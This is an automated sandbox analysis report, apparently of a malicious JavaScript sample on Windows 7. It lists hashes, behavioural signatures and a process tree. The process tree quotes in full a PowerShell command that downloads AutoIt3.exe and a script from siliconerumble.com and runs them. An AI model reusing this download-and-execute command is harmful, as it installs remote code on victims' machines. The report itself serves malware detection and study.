Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
09-11-2023 02:23
Static task
static1
Behavioral task
behavioral1
Sample
aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe.js
Resource
win7-20231023-en
4 signatures
150 seconds
General
-
Target
aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe.js
-
Size
252KB
-
MD5
9edd0adf749c9406b020d9ca613daa62
-
SHA1
701cc4130fd3b8b17d6692101b7bd80d9a14b68c
-
SHA256
aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe
-
SHA512
99df3475b72b2576123a7a46338470346b30e6ac10d9bd8506c6b359de2bf7308d0d85ece3039f3388d6feed7a6e7774eb4300c4ecc4435bf6361e59ab8e52da
-
SSDEEP
6144:ge7hgXeerjqlI2Iro+ra4xB9ElITe7hgXeerjqlI2Iro+8:gIhgSlI23qa4xB9ElITIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2012 powershell.exe 2012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2012 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2560 wrote to memory of 2012 2560 wscript.exe 28 PID 2560 wrote to memory of 2012 2560 wscript.exe 28 PID 2560 wrote to memory of 2012 2560 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe.js1⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://siliconerumble.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://siliconerumble.com:443/msijhoziucv' -OutFile 'jhoziucv.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'jhoziucv.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-